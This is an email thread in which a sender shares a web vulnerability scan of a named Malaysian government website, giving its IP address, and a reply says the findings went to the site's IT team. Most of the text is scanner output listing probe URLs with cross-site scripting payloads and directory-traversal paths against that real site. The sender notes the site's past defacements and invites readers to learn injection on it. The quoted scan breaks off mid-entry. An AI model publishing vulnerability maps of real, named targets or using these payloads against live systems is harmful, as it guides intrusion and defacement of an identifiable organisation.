Thanks bro,<br>I've already forwarded the info to the MARDI IT team.<br><br><div class="gmail_quote">On Fri, Sep 4, 2009 at 1:29 AM, Mohd Fazli Azran Abd Malek <span dir="ltr">&lt;<a href="mailto:mfazliazran@gmail.com">mfazliazran@gmail.com</a>&gt;</span> wrote:<br>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">Hi everyone,<br>
<br>
I scanned one website that maybe someone is interested in. When I saw this<br>
server, it was not strange that this site has been defaced many times... I am sharing<br>
this site with you all. This is one of the government websites that I<br>
scanned; it has many vulnerabilities, and I hope others will know and learn how<br>
injection and exploits can be used against applications and systems. Here is the<br>
report of my scan:<br>
<br>
---------------------------------------------------------------------------<br>
+ Target IP:          202.186.96.231<br>
+ Target Hostname:    <a href="http://www.mardi.gov.my" target="_blank">www.mardi.gov.my</a><br>
+ Target Port:        80<br>
+ Start Time:         2009-09-05 1:01:01<br>
---------------------------------------------------------------------------<br>
+ Server: lighttpd/1.5.0<br>
+ No CGI Directories found (use &#39;-C all&#39; to force check all possible<br>
dirs)<br>
- Allowed HTTP Methods: OPTIONS, GET, HEAD, POST<br>
+ OSVDB-0: GET /help/ : Help directory should not be accessible<br>
+ OSVDB-0: GET /vgn/jsp/jspstatus56 : Vignette CMS admin/maintenance<br>
script available.<br>
+ OSVDB-0: GET /typo3conf/ : This may contain sensitive Typo3 files.<br>
+ OSVDB-0: GET /mysql/db_details_importdocsql.php?<br>
submit_show=true&amp;do=import&amp;docpath=../../../../../../../etc :<br>
phpMyAdmin allows directory listings remotely. Upgrade to version<br>
2.5.3 or higher. <a href="http://www.securityfocus.com/bid/7963" target="_blank">http://www.securityfocus.com/bid/7963</a>.<br>
+ OSVDB-8450: GET /db_details_importdocsql.php?<br>
submit_show=true&amp;do=import&amp;docpath=../../../../../../../etc :<br>
phpMyAdmin allows directory listings remotely. Upgrade to version<br>
2.5.3 or higher. <a href="http://www.securityfocus.com/bid/7963" target="_blank">http://www.securityfocus.com/bid/7963</a>.<br>
+ OSVDB-8450: GET /3rdparty/phpMyAdmin/db_details_importdocsql.php?<br>
submit_show=true&amp;do=import&amp;docpath=../../../../../../../etc :<br>
phpMyAdmin allows directory listings remotely. Upgrade to version<br>
2.5.3 or higher. <a href="http://www.securityfocus.com/bid/7963" target="_blank">http://www.securityfocus.com/bid/7963</a>.<br>
+ OSVDB-8450: GET /phpMyAdmin/db_details_importdocsql.php?<br>
submit_show=true&amp;do=import&amp;docpath=../../../../../../../etc :<br>
phpMyAdmin allows directory listings remotely. Upgrade to version<br>
2.5.3 or higher. <a href="http://www.securityfocus.com/bid/7963" target="_blank">http://www.securityfocus.com/bid/7963</a>.<br>
+ OSVDB-0: GET /SUNWmc/htdocs/ : Sun SMC (Solaris Management Console)<br>
is running.<br>
+ OSVDB-0: GET /themes/mambosimple.php?detection=detected&amp;sitename=&lt;/<br>
title&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/<br>
Server is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /index.php?<br>
option=search&amp;searchword=&lt;script&gt;alert(document.cookie);&lt;/script&gt; :<br>
Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /emailfriend/emailnews.php?id=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /emailfriend/emailfaq.php?id=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /emailfriend/emailarticle.php?id=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /administrator/upload.php?newbanner=1&amp;choice=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /administrator/popups/sectionswindow.php?type=web&amp;link=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /administrator/gallery/view.php?path=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /administrator/gallery/uploadimage.php?directory=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /administrator/gallery/navigation.php?directory=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /administrator/gallery/gallery.php?directory=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /index.php?dir=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; :<br>
Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.<br>
+ OSVDB-0: GET /https-admserv/bin/index?/<br>
&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sun ONE Web Server 6.1<br>
administration control is vulnerable to XSS attacks.<br>
+ OSVDB-0: GET /clusterframe.jsp?<br>
cluster=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Macromedia JRun 4.x<br>
JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.<br>
+ OSVDB-0: GET /upload.php?type=\&quot;&lt;script&gt;alert(document.cookie)&lt;/<br>
script&gt; : Mambo PHP Portal/Server is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-4619: GET /soinfo.php?\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The PHP script soinfo.php is vulnerable to Cross Site<br>
Scripting Set expose_php = Off in php.ini.<br>
+ OSVDB-0: GET /servlet/MsgPage?<br>
action=test&amp;msg=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : NetDetector 3.0<br>
and below are vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /servlets/MsgPage?<br>
action=badlogin&amp;msg=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : The<br>
NetDetector install is vulnerable to Cross Site Scripting (XSS) in<br>
it&#39;s invalid login message. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de<br>
%20registro%20Web&amp;URL=MasterSettings/Web_LogSettings.asp?<br>
tab1=TabsWebServer%26tab2=TabsWebLogSettings<br>
%26__SAPageKey=5742D5874845934A134CD05F39C63240&amp;ReturnURL=<br>
\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : IIS 6 on Windows 2003 is<br>
vulnerable to Cross Site Scripting (XSS) in certain error messages. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-17665: GET /SiteServer/Knowledge/Default.asp?ctr=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Site Server is vulnerable to<br>
Cross Site Scripting<br>
+ OSVDB-17666: GET /_mem_bin/formslogin.asp?<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Site Server is vulnerable to<br>
Cross Site Scripting<br>
+ OSVDB-0: GET /catinfo?&lt;u&gt;&lt;b&gt;TESTING : The Interscan Viruswall<br>
catinfo script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /templates/form_header.php?<br>
noticemsg=&lt;script&gt;javascript:alert(document.cookie)&lt;/script&gt; :<br>
MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /supporter/index.php?<br>
t=updateticketlog&amp;id=&amp;lt;script&amp;gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;lt;/script&amp;gt; : MyHelpdesk from <a href="http://myhelpdesk.sourceforge.net/" target="_blank">http://myhelpdesk.sourceforge.net/</a><br>
  versions v20020509 and older are vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /supporter/index.php?<br>
t=tickettime&amp;id=&amp;lt;script&amp;gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;&amp;lt;/<br>
script&amp;gt; : MyHelpdesk from <a href="http://myhelpdesk.sourceforge.net/" target="_blank">http://myhelpdesk.sourceforge.net/</a><br>
versions v20020509 and older are vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /supporter/index.php?<br>
t=ticketfiles&amp;id=&amp;lt;script&amp;gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;lt;/script&amp;gt; : MyHelpdesk from <a href="http://myhelpdesk.sourceforge.net/" target="_blank">http://myhelpdesk.sourceforge.net/</a><br>
  versions v20020509 and older are vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /sunshop.index.php?<br>
action=storenew&amp;username=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; :<br>
SunShop is vulnerable to Cross Site Scripting (XSS) in the signup<br>
page. CA-200-02.<br>
+ OSVDB-0: GET /submit.php?subject=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;story=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;storyext=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;&amp;op=Preview :<br>
This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /ss000007.pl?PRODREF=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Actinic E-Commerce services is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /setup.exe?&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;page=list_users&amp;user=P : CiscoSecure ACS v3.0(1) Build 40<br>
allows Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: POST /servlet/custMsg?guestName=&lt;script&gt;alert(\&quot;Vulnerable<br>
\&quot;)&lt;/script&gt; : Bajie HTTP JServer is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: POST /servlet/CookieExample?<br>
cookiename=&lt;script&gt;alert(\&quot;Vulnerable\&quot;)&lt;/script&gt; : Bajie HTTP JServer<br>
is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /servlet/ContentServer?<br>
pagename=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Open Market<br>
Inc. ContentServer is vulnerable to Cross Site Scripting (XSS) in the<br>
login-error page. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /search/index.cfm?&lt;script&gt;alert(\&quot;Vulnerable\&quot;)&lt;/<br>
script&gt; : Search agent allows Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /search.php?zoom_query=&lt;script&gt;alert(\&quot;hello\&quot;)&lt;/<br>
script&gt; : Wrensoft Zoom Search Engine is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /search.php?<br>
searchstring=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Gallery 1.3.4<br>
and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the<br>
latest version. <a href="http://www.securityfocus.com/bid/8288" target="_blank">http://www.securityfocus.com/bid/8288</a>.<br>
+ OSVDB-0: GET /search.php?searchfor=\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;);&lt;/<br>
script&gt; : Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /search.asp?term=&lt;%00script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error<br>
pages (only some browsers will render this). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /replymsg.php?<br>
send=1&amp;destin=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : This version of<br>
PHP-Nuke&#39;s replymsg.php is vulnerable to Cross Site Scripting (XSs). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /pm_buddy_list.asp?name=A&amp;desc=B<br>
%22%3E&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;%3Ca%20s=%22&amp;code=1 : Web<br>
Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /phpwebsite/index.php?module=search<br>
&amp;SEA_search_op=continue&amp;PDA_limit=10\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : phpWebSite 0.9.x and below are vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /phpwebsite/index.php?module=pagemaster<br>
&amp;PAGE_user_op=view_page&amp;PAGE_id=10\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;MMN_position=[X:X] : phpWebSite 0.9.x and below are vulnerable<br>
to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /phpwebsite/index.php?<br>
module=fatcat&amp;fatcat[user]=viewCategory&amp;fatcat_id=1%00+<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : phpWebSite 0.9.x and below<br>
are vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /phpwebsite/index.php?<br>
module=calendar&amp;calendar[view]=day&amp;month=2&amp;year=2003&amp;day=1+<br>
%00\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : phpWebSite 0.9.x and<br>
below are vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /phptonuke.php?filnavn=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : PHPNuke add-on PHPToNuke is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-32774: GET /phpinfo.php?VARIABLE=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Contains PHP configuration information and is vulnerable to<br>
Cross Site Scripting (XSS).<br>
+ OSVDB-32774: GET /phpinfo.php3?VARIABLE=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Contains PHP configuration information and is vulnerable to<br>
Cross Site Scripting (XSS).<br>
+ OSVDB-0: GET /phpBB/viewtopic.php?<br>
topic_id=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : phpBB is vulnerable to<br>
Cross Site Scripting (XSS), upgrade to the latest version. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /phpBB/viewtopic.php?t=17071&amp;highlight=\&quot;&gt;<br>
\&quot;&lt;script&gt;javascript:alert(document.cookie)&lt;/script&gt; : phpBB is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /phorum/admin/header.php?<br>
GLOBALS[message]=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Phorum 3.3.2a<br>
and below from <a href="http://phorum.org" target="_blank">phorum.org</a> is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /phorum/admin/footer.php?<br>
GLOBALS[message]=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Phorum 3.3.2a<br>
and below from <a href="http://phorum.org" target="_blank">phorum.org</a> is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /netutils/whodata.stm?<br>
sitename=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server<br>
default script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /nav/cList.php?root=&lt;/<br>
script&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)/&lt;script&gt; : RaQ3 server script is<br>
vulnerable to Cross Site Scripting (XSS).  <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /myphpnuke/links.php?<br>
op=search&amp;query=[script]alert(&#39;Vulnerable);[/script]?query= :<br>
myphpnuke is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /myphpnuke/links.php?<br>
op=MostPopular&amp;ratenum=[script]alert(document.cookie);[/<br>
script]&amp;ratetype=percent : myphpnuke is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /myhome.php?<br>
action=messages&amp;box=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : OpenBB<br>
1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /msadm/user/login.php3?account_name=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : The Sendmail Server Site<br>
User login is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /msadm/site/index.php3?authid=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : The Sendmail Server Site<br>
Administrator Login is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /msadm/domain/index.php3?account_name=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : The Sendmail Server Site<br>
Domain Administrator login is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules/Submit/index.php?<br>
op=pre&amp;title=&lt;script&gt;alert(document.cookie);&lt;/script&gt; : Basit cms 1.0<br>
is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?site_font=}--&gt;&lt;/<br>
style&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : PHP-Nuke 6.0 is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?<br>
name=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : PHP-Nuke 6.0 is vulnerable<br>
to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?<br>
Default_Theme=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : PHP-Nuke 6.0 is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?bgcolor1=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : PHP-Nuke 6.0 is vulnerable<br>
to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules.php?op=modload&amp;name=Xforum&amp;file=member<br>
&amp;action=viewpro&amp;member=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The XForum (PHPNuke Add-on module) is vulnerable to Cross<br>
Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?<br>
op=modload&amp;name=Xforum&amp;file=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;fid=2 : The XForum (PHPNuke Add-on module) is vulnerable to<br>
Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules.php?<br>
op=modload&amp;name=Wiki&amp;file=index&amp;pagename=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Wiki PostNuke Module is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?op=modload&amp;name=Web_Links&amp;file=index<br>
&amp;l_op=viewlink&amp;cid=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The PHPNuke forum is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?<br>
op=modload&amp;name=WebChat&amp;file=index&amp;roomid=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The PHPNuke forum is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?op=modload&amp;name=Members_List<br>
&amp;file=index&amp;letter=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : This install of PHPNuke&#39;s modules.php is vulnerable to Cross<br>
Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?op=modload&amp;name=Guestbook<br>
&amp;file=index&amp;entry=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The PHPNuke forum is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?<br>
op=modload&amp;name=FAQ&amp;file=index&amp;myfaq=yes&amp;id_cat=1&amp;categories=%3Cimg<br>
%20src=javascript:alert(document.cookie);%3E&amp;parent_id=0 : Post Nuke<br>
0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules.php?op=modload&amp;name=DMOZGateway<br>
&amp;file=index&amp;topic=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The DMOZGateway (PHPNuke Add-on module) is vulnerable to<br>
Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules.php?name=Your_Account&amp;op=userinfo<br>
&amp;username=bla&lt;script&gt;alert(document.cookie)&lt;/<br>
script&gt; : Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules.php?<br>
name=Your_Account&amp;op=userinfo&amp;uname=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The PHPNuke forum is vulnerable to Cross Site Scripting<br>
